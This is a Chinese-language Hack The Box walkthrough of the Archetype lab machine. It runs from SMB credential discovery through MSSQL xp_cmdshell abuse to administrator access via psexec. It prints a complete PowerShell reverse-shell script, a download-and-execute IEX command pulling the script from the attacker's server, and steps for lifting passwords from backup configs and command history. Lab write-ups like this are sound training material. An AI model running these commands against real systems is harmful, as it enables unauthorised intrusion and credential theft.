环境配置

首先在Kali上配置安装openvpn

sudo apt-get update
sudo apt-get install network-manager-openvpn-gnome \
network-manager-pptp network-manager-pptp-gnome \
network-manager-strongswan network-manager-vpnc \
network-manager-vpnc-gnome -y

之后下载openvpn配置文件

sudo openvpn example.ovpn

这里坑点是记得更改电脑时区，之后按照Hackthebox给的配置文件进行连接之后，查看本机IP这时多了个网卡

接下来扫描端口

sudo ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
sudo nmap -sC -sV -p$ports 10.10.10.27 

我这里用的是

sudo nmap -sC -sV -T4 10.10.10.27

这里开了445和1433，尝试smb连接

smbclient -N -L \\\\10.10.10.27\\

看到了backups，看看里面有什么

smbclient -N \\\\10.10.10.27\\backups

接下来就可以在这个配置文件里面看到账号密码

接下来使用impactket进行mssqlclient.py连接

python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

接下来查看当前用户权限是不是超级管理员

select IS_SRVROLEMEMBER('sysadmin')

这样我们就可以调用xp_cmdshell了，但是首先要开启

 EXEC sp_configure 'Show Advanced Options', 1;
 reconfigure;
 sp_configure;
 EXEC sp_configure 'xp_cmdshell', 1
 reconfigure;
 xp_cmdshell "whoami" 

发现是一个低权限用户，接下来信息收集

xp_cmdshell "systeminfo"

输出结果如下

Host Name:                 ARCHETYPE                                               
OS Name:                   Microsoft Windows Server 2019 Standard                  
OS Version:                10.0.17763 N/A Build 17763                              
OS Manufacturer:           Microsoft Corporation                                   
OS Configuration:          Standalone Server                                       
OS Build Type:             Multiprocessor Free                                     
Registered Owner:          Windows User                                            
Registered Organization:                                                           
Product ID:                00429-00521-62775-AA442                                 
Original Install Date:     1/19/2020, 10:39:36 PM                                  
System Boot Time:          1/12/2021, 3:29:32 PM                                   
System Manufacturer:       VMware, Inc.                                            
System Model:              VMware7,1                                               
System Type:               x64-based PC                                            
Processor(s):              1 Processor(s) Installed.                               
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz   
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019   
Windows Directory:         C:\Windows                                              
System Directory:          C:\Windows\system32                                     
Boot Device:               \Device\HarddiskVolume2                                 
System Locale:             en-us;English (United States)                           
Input Locale:              en-us;English (United States)                           
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)                  
Total Physical Memory:     2,047 MB                                                
Available Physical Memory: 289 MB                                                  
Virtual Memory: Max Size:  2,691 MB                                                
Virtual Memory: Available: 661 MB                                                  
Virtual Memory: In Use:    2,030 MB                                                
Page File Location(s):     C:\pagefile.sys                                         
Domain:                    WORKGROUP                                               
Logon Server:              N/A                                                     
Hotfix(s):                 2 Hotfix(s) Installed.                                  
                           [01]: KB4532947                                         
                           [02]: KB4464455                                         
Network Card(s):           1 NIC(s) Installed.                                     
                           [01]: vmxnet3 Ethernet Adapter                          
                                 Connection Name: Ethernet0 2                      
                                 DHCP Enabled:    No                               
                                 IP address(es)                                    
                                 [01]: 10.10.10.27                                 
                                 [02]: fe80::e87a:ab8a:fca0:90e6                   
                                 [03]: dead:beef::e87a:ab8a:fca0:90e6              

Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.   

查看用户

xp_cmdshell "net user"

查看开放端口

xp_cmdshell "netstat -ano"

输出结果如下

  Proto  Local Address          Foreign Address        State           PID         
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       828         
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1548        
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       452         
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       928         
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       988         
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       584         
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       1132        
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       596         
  TCP    10.10.10.27:135        10.10.14.97:58472      ESTABLISHED     828         
  TCP    10.10.10.27:139        0.0.0.0:0              LISTENING       4           
  TCP    10.10.10.27:1433       10.10.14.60:36584      TIME_WAIT       0           
  TCP    10.10.10.27:1433       10.10.14.107:44280     ESTABLISHED     1548        
  TCP    10.10.10.27:1433       10.10.14.108:48248     ESTABLISHED     1548        
  TCP    10.10.10.27:49664      10.10.14.97:38916      ESTABLISHED     452         
  TCP    10.10.10.27:49665      10.10.14.97:43884      ESTABLISHED     928         
  TCP    10.10.10.27:49666      10.10.14.97:54500      ESTABLISHED     988         
  TCP    10.10.10.27:49667      10.10.14.97:40818      ESTABLISHED     584         
  TCP    10.10.10.27:49668      10.10.14.97:36848      ESTABLISHED     1132        
  TCP    10.10.10.27:49669      10.10.14.97:57702      ESTABLISHED     596         
  TCP    10.10.10.27:49690      10.10.14.89:443        ESTABLISHED     3616        
  TCP    10.10.10.27:49736      10.10.14.3:443         ESTABLISHED     1716        
  TCP    10.10.10.27:49738      10.10.14.53:443        ESTABLISHED     3592        
  TCP    10.10.10.27:49789      10.10.14.4:1234        ESTABLISHED     1344        
  TCP    10.10.10.27:49791      10.10.14.4:1234        ESTABLISHED     2184        
  TCP    10.10.10.27:49817      10.10.14.54:443        ESTABLISHED     1100        
  TCP    10.10.10.27:49825      10.10.14.85:443        ESTABLISHED     3572        
  TCP    10.10.10.27:49851      10.10.14.88:443        ESTABLISHED     3484        
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       1548        
  TCP    [::]:135               [::]:0                 LISTENING       828         
  TCP    [::]:445               [::]:0                 LISTENING       4           
  TCP    [::]:1433              [::]:0                 LISTENING       1548        
  TCP    [::]:5985              [::]:0                 LISTENING       4           
  TCP    [::]:47001             [::]:0                 LISTENING       4           
  TCP    [::]:49664             [::]:0                 LISTENING       452         
  TCP    [::]:49665             [::]:0                 LISTENING       928         
  TCP    [::]:49666             [::]:0                 LISTENING       988         
  TCP    [::]:49667             [::]:0                 LISTENING       584         
  TCP    [::]:49668             [::]:0                 LISTENING       1132        
  TCP    [::]:49669             [::]:0                 LISTENING       596         
  TCP    [::1]:1434             [::]:0                 LISTENING       1548        
  UDP    0.0.0.0:123            *:*                                    1464        
  UDP    0.0.0.0:500            *:*                                    988         
  UDP    0.0.0.0:4500           *:*                                    988         
  UDP    0.0.0.0:5353           *:*                                    612         
  UDP    0.0.0.0:5355           *:*                                    612         
  UDP    10.10.10.27:137        *:*                                    4           
  UDP    10.10.10.27:138        *:*                                    4           
  UDP    127.0.0.1:53076        *:*                                    988         
  UDP    [::]:123               *:*                                    1464        
  UDP    [::]:500               *:*                                    988         
  UDP    [::]:4500              *:*                                    988         
  UDP    [::]:5353              *:*                                    612         
  UDP    [::]:5355              *:*                                    612   

接下来想办法把shell反弹回来，官方WP使用如下脚本

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 

注意替换成自己本机IP

更改完IP后保存为shell.ps1，接下来使用python搭建一个httpserver

python3 -m http.server 80 

之后我们用nc监听端口443

sudo nc -lvvp 443

接下来就是让我们的目标下载并执行我们的shell.ps1

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.108/shell.ps1\");"

我们已经接收到反弹shell了

接下来就是查看历史记录

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 

找到了administrator的密码，接下来使用psexec.py登录

python3 psexec.py administrator@10.10.10.27

此时我们已经是管理员权限

whoami

顺利拿到桌面的FLAG